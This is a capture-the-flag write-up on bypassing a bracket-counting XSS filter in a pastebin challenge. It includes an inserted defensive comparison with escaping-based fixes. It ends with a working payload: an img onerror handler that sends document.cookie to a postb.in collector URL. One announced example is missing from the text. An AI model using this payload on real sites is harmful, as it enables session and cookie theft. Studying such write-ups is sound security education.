static-pastebin
This is a typical XSS challenge: we want the admin bot to visit our pastebin page and execute JavaScript that sends us its cookie.
Filters and Network
I typed some strings into the pastebin and monitored the network activity. There is no POST request, and when I checked the URL it carried a base64 string as an argument. This means all the website does is encode the string we input and decode it again when it needs to display it.
So I tried the basic form of XSS and ran into the following filter in the page's code:
```javascript
function clean(input) {
  let brackets = 0;      // nesting depth of '<' ... '>'
  let result = '';
  for (let i = 0; i < input.length; i++) {
    const current = input.charAt(i);
    if (current == '<') {
      brackets++;        // entering a tag
    }
    if (brackets == 0) {
      result += current; // only characters outside a tag are kept
    }
    if (current == '>') {
      brackets--;        // leaving a tag (can go negative: not clamped)
    }
  }
  return result;
}
```
This is the clean() function. It counts the number of < and > characters it has seen and only copies a character to the output while that count is 0, so anything inside angle brackets is dropped.
Bypassing the filter
We can bypass the filter by sending a stray > first, which sets brackets to -1 before our tag begins. The following < then brings the counter back to 0, so the whole tag, including its closing >, gets copied into the output.
An alert() between <script> and </script> still doesn't show up, because after the opening tag's > the counter is back at -1 and the text between the tags is dropped.
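To make the flaw concrete from the defender's side, here is an added example (not code from the challenge or the original writeup) that places the challenge's clean() filter next to two hardened alternatives: a version that clamps the depth counter at zero, and plain HTML entity encoding. The sample inputs are constructed and use a harmless <b> tag; the second one has the same shape as the bypass above, a stray > followed by a tag. The helper containsTag() is an assumed, hand-written check, not part of the challenge.

```javascript
// Added example: the challenge's clean() filter beside two hardened versions,
// run over constructed inputs (not the original writeup's code).

// The challenge's filter, reproduced unchanged for comparison.
function clean(input) {
  let brackets = 0;
  let result = '';
  for (let i = 0; i < input.length; i++) {
    const current = input.charAt(i);
    if (current == '<') brackets++;
    if (brackets == 0) result += current;
    if (current == '>') brackets--;
  }
  return result;
}

// Fix 1: never let the depth counter drop below zero, so a leading '>'
// cannot pre-pay for the '<' that follows. Still a strip-tags approach.
function cleanClamped(input) {
  let depth = 0;
  let result = '';
  for (const ch of input) {
    if (ch === '<') depth++;
    if (depth === 0) result += ch;
    if (ch === '>') depth = Math.max(0, depth - 1);
  }
  return result;
}

// Fix 2 (preferred): do not strip, encode. Once every metacharacter is an
// entity the browser cannot parse user text as markup, whatever the
// ordering of '<' and '>' in the input.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed helper: does the output still contain something the HTML parser
// would treat as a start tag?
function containsTag(s) {
  return /<[a-zA-Z][^>]*>/.test(s);
}

// Constructed sample inputs.
const samples = [
  'hello <b>world</b>',        // ordinary user text containing a tag
  '><b class="x">hidden</b>',  // bypass shape: a stray '>' before the tag
];

// Run each sample through all three filters and flag surviving tags.
function evaluate() {
  return samples.map((s) => ({
    input: s,
    clean: clean(s),
    clamped: cleanClamped(s),
    escaped: escapeHtml(s),
    cleanLeaksTag: containsTag(clean(s)),
    clampedLeaksTag: containsTag(cleanClamped(s)),
    escapedLeaksTag: containsTag(escapeHtml(s)),
  }));
}

for (const r of evaluate()) console.log(r);
```

On the second sample, clean() keeps the whole <b class="x"> tag but drops the text "hidden" between the tags, which is exactly the behaviour the writeup observed: tag-level payloads survive while script bodies vanish. The clamped variant strips the tag, and the escaped output contains no parsable markup at all.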
Alternate form of XSS
There are many forms of XSS, including ones where the script sits inside the tag's own angle brackets as an event handler attribute, for example this one:
And sure enough it worked; now we need to grab the admin bot's cookie.
Post Bin
Post Bin is a tool that collects every request sent to a given URL, so we can exfiltrate the document.cookie value by appending it as a query-string argument.
Here's the final payload:
```html
><img src=x onerror="javascript:window.location.assign(`https://postb.in/1593716639876-9019670642446?cookie=${document.cookie}`)">
```
Flag
I base64-encoded the payload, appended it to the URL and fed that to the bot. Sure enough, my Post Bin page received a request containing the document cookie, which is the flag.